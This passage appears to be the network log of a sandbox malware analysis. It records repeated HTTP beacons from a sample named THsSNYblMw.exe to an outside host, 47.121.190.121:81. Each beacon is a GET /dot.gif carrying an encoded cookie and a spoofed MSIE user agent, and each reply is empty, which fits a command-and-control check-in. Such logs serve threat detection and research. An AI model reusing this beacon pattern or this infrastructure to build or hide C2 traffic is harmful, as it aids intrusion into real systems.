Jan 9, 2025 23:08:59.514986992 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:00.458390951 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50104	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:00.573081970 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:01.555574894 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50105	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:01.683639050 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:02.651988029 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50106	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:02.773005962 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:03.723397017 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50107	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:03.840604067 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:04.779134035 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50108	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:04.898753881 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:05.859988928 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50109	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:05.977766991 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:06.940984011 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50110	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:07.059695959 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:07.997203112 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50111	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:08.119330883 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:09.078099012 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50112	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:09.195669889 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:10.156932116 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50113	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:10.276360035 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:11.227045059 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50114	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:11.351558924 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:12.324892998 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50115	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:12.447288990 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:13.392088890 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50116	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:13.507942915 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:14.447648048 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50117	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:14.573215008 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:15.547224998 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50118	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:15.670316935 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:16.608314991 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50119	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:16.726998091 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:17.671467066 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50120	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:17.789761066 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:18.747545958 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50121	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:18.873239994 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:19.847258091 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50122	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:19.963390112 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50123	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:24.086541891 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:25.018026114 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50124	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:25.132939100 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:26.069216967 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50125	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:26.183331013 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:27.124710083 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50126	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:27.241897106 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:28.207853079 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50127	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:28.322384119 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:29.284702063 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50128	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:29.400731087 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:30.367886066 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50129	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:30.494244099 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:31.464673042 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50130	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:31.586141109 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:32.539551973 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50131	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:09:32.650588036 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:09:33.600558996 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:09:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50132	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
